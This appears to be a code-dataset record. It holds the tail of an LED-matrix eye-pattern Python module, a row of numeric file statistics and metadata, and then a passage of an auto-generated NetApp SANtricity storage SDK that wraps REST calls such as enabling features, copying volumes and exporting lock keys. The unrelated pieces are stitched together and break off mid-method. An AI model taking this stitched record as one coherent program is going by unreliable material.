(4, 2), (4, 5),
(5, 2), (5, 5),
(6, 2), (6, 3), (6, 4), (6, 5)]
SCAN_LINE_HORIZ_I = lambda i : [(i, j) for j in range(8)]
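# --- Hedged usage sketch (not part of the original module) ---
# Assuming each tuple is a (row, column) coordinate on an 8x8 LED matrix, this
# helper renders a frame as ASCII so the eye shapes can be checked without hardware.
def render_frame(frame, size=8):
    lit = set(frame)
    for row in range(size):
        print("".join("#" if (row, col) in lit else "." for col in range(size)))

render_frame(LEFT_HAPPY)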
| 38.742489
| 71
| 0.214468
| 1,528
| 9,027
| 1.219241
| 0.018979
| 0.040794
| 0.05475
| 0.045089
| 0.899624
| 0.866881
| 0.834675
| 0.831455
| 0.785293
| 0.761675
| 0
| 0.295967
| 0.464385
| 9,027
| 232
| 72
| 38.909483
| 0.089349
| 0
| 0
| 0.663415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
220c3ea9cbe8d711f1326ec778d1edb2301d8ebd
| 61,719
|
py
|
Python
|
netapp/santricity/api/symbol/e_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 5
|
2016-08-23T17:52:22.000Z
|
2019-05-16T08:45:30.000Z
|
netapp/santricity/api/symbol/e_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 2
|
2016-11-10T05:30:21.000Z
|
2019-04-05T15:03:37.000Z
|
netapp/santricity/api/symbol/e_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 7
|
2016-08-25T16:11:44.000Z
|
2021-02-22T05:31:25.000Z
|
#!/usr/bin/env python
# coding: utf-8
"""
EApi.py
The Clear BSD License
Copyright (c) – 2016, NetApp, Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import absolute_import
import sys
import os
# python 2 and python 3 compatibility library
from six import iteritems
from ....santricity.configuration import Configuration
from ....santricity.api_client import ApiClient
class EApi(object):
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient(context_path='/devmgr/v2')
self.api_client = config.api_client
def symbol_enable_asup(self, system_id, **kwargs):
"""
This procedure is used to enable Autosupport.
Documented return codes: ok, notImplemented.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_asup(system_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_asup" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_asup`")
resource_path = '/storage-systems/{system-id}/symbol/enableASUP'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_enable_external_kms(self, system_id, body, **kwargs):
"""
Enables external KMS.
Documented return codes: ok, externalKmsEnabled, externalKmsFailed, externalKmsNotCompliant, externalKmsTimeout.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_external_kms(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: WrappedLockKeyReturn
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_external_kms" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_external_kms`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_enable_external_kms`")
resource_path = '/storage-systems/{system-id}/symbol/enableExternalKMS'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WrappedLockKeyReturn',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_enable_feature(self, system_id, body, **kwargs):
"""
This procedure causes the \"premium\" features identified in the feature keys of the argument to be enabled.
Documented return codes: ok, error, invalidSafeId, invalidSafeKey, invalidSafeCapability, invalidSafeVersion, perfTierSafeUpgradeDisabled, safeControllerNotSubjectToRaid6, premiumFeatureLimitExceedsMaximum, previouslyEnabledForEval, featureNotKeyable.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_feature(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param FeatureKey body: A key for the \"premium\" feature to be enabled. This key must be obtained from an authorized source in order to be accepted by the array controller. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_feature`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_enable_feature`")
resource_path = '/storage-systems/{system-id}/symbol/enableFeature'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_enable_feature_evaluation(self, system_id, body, **kwargs):
"""
Used to start an evaluation of a specified feature using the duration specified for the sub-model ID in the FBDT.
Documented return codes: ok, noHeap, invalidSafeCapability, previouslyEnabledForEval, evalNotSupported, invalidCapability.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_feature_evaluation(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get an HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_feature_evaluation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_feature_evaluation`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_enable_feature_evaluation`")
resource_path = '/storage-systems/{system-id}/symbol/enableFeatureEvaluation'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_enable_flash_cache_volume(self, system_id, body, **kwargs):
"""
This procedure creates a flash cache proxy linked to the referenced user RAID Volume and the flash cache High Level Volume. The flash cache attribute on the RAID Volume will be turned on.
Documented return codes: ok, error, illegalParam, noHeap, volumeNotExist, volumeReconfiguring, tryAlternate, internalError, volumeFormatting, invalidVolumeref, volumeOffline, notFlashcacheVol, flashcacheDeleted, flashCacheInvalidBaseVol.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_enable_flash_cache_volume(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param VolumeFlashCacheDescriptor body: A reference to the user volume to link to the flash cache proxy, and a reference to the flash cache volume. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get an HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_enable_flash_cache_volume" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_enable_flash_cache_volume`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_enable_flash_cache_volume`")
resource_path = '/storage-systems/{system-id}/symbol/enableFlashCacheVolume'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_establish_volume_copy(self, system_id, body, **kwargs):
"""
This procedure establishes a volume copy.
Documented return codes: ok, illegalParam, noHeap, tryAlternate, internalError, iconFailure, invalidCopyPriority, copyIncompatibleSource, copyIncompatibleTarget, copyGhostSource, copyGhostTarget, copyInvalidSourceRef, copyInvalidTargetRef, copyInvalidSourceState, copyInvalidTargetState, copySourceReconfig, copyTargetReconfig, copyTargetTooSmall, copyTargetLimit, maxVolumeCopysExceeded, copySourceReservation, copySourceFormat, copyTargetFormat, volcopyFeatureDisabled, copySourceZeroCapacity, copyApptagMismatch.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_establish_volume_copy(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param VolumeCopyCreationDescriptor body: The VolumeCopyCreationDescriptor for the volume copy. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: ReturnCodeWithRef
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get an HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_establish_volume_copy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_establish_volume_copy`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_establish_volume_copy`")
resource_path = '/storage-systems/{system-id}/symbol/establishVolumeCopy'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReturnCodeWithRef',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_estimate_pit_rollback_repository_utilization(self, system_id, body, **kwargs):
"""
This procedure will return the amount of repository capacity necessary to perform a rollback operation.
Documented return codes: ok, invalidPitRef.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_estimate_pit_rollback_repository_utilization(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A reference to a PiT (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: PITGroupRollbackUtilizationEstimateReturned
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get an HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_estimate_pit_rollback_repository_utilization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_estimate_pit_rollback_repository_utilization`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_estimate_pit_rollback_repository_utilization`")
resource_path = '/storage-systems/{system-id}/symbol/estimatePITRollbackRepositoryUtilization'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PITGroupRollbackUtilizationEstimateReturned',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_expand_concat_volume(self, system_id, body, **kwargs):
"""
This procedure will expand a concatenated volume by adding another member RAID volume. Returns the ref for the new ConcatVolMember added.
Documented return codes: ok, invalidProtection, invalidConcatVolMemberLabel, concatVolMemberTooSmall, concatMemberLimitExceeded, invalidMemberVol, memberVolMapped, invalidMemberVolState, incompatibleMemberVol, concatVolumeFailed, cannotExpandConcatMember, repositoryFull, insufficientExpansionSpace, invalidExpansionSize, incompatibleRepositorySecurity.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_expand_concat_volume(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param ConcatVolumeExpansionDescriptor body: A descriptor of the concat volume to be expanded. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: ReturnCodeWithRef
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get an HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_expand_concat_volume" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_expand_concat_volume`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_expand_concat_volume`")
resource_path = '/storage-systems/{system-id}/symbol/expandConcatVolume'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReturnCodeWithRef',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_expand_thin_volume_virtual_capacity(self, system_id, body, **kwargs):
"""
This procedure will expand a thin volume's virtual capacity. It does not affect the repository volume's capacity.
Documented return codes: ok, error, illegalParam, noHeap, tryAlternate, internalError, invalidVolumeref, illegalVolume, invalidVirtualCapacity.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_expand_thin_volume_virtual_capacity(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param ThinVolumeExpansionDescriptor body: An object containing all of the attributes necessary to expand a thin volume's virtual capacity. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get an HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_expand_thin_volume_virtual_capacity" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_expand_thin_volume_virtual_capacity`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_expand_thin_volume_virtual_capacity`")
resource_path = '/storage-systems/{system-id}/symbol/expandThinVolumeVirtualCapacity'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_export_lock_key(self, system_id, body, **kwargs):
"""
This procedure returns the WrappedLockKeyReturn union for the array. The WrappedLockKeyReturn contains the WrappedLockKey structure for the array it was exported from.
No return codes have been documented for this API!
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_export_lock_key(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The wrapped pass phrase used to encrypt the lock key. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: WrappedLockKeyReturn
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get an HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_export_lock_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_export_lock_key`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_export_lock_key`")
resource_path = '/storage-systems/{system-id}/symbol/exportLockKey'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WrappedLockKeyReturn',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_export_volume_group(self, system_id, body, **kwargs):
"""
This procedure places the identified volume group in an \"exported\" state so that its drives may be removed and installed into another array.
Documented return codes: ok, volumeGroupHasHotspare, volumeGroupReconfiguring, volumeGroupReconstructing, volumeGroupNotComplete, volumeGroupHasFailedDrives, volumeGroupHasNonOptimalVols, volumeGroupHasMirrorRelationship, volumeGroupHasVolcopyRelationship, volumeGroupHasMirroringMetadata, volumeGroupHasMappedVols, volumeGroupHasReservations, volumeGroupHasIncompatibleDacstores, volumeLimitExceeded, volumeGroupHasUnknownRaidLevel, volumeGroupHasUnsupportedRaidLevel, volumeGroupHasCloneOpportunity, volumeGroupHasInsufficientDrives, volumeGroupHasFailedVols, volumeGroupHasSnapshotRelationship, noNativeSstor, volumeInitializing, exportingDrivesDatabaseResynchronizing, exportingDrivesDatabaseFailed, volumeGroupHasArvmRelationship, volumeGroupHasPitgroupRelationship, volumeGroupHasPitviewRelationship, volumeGroupHasConcatRelationship.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
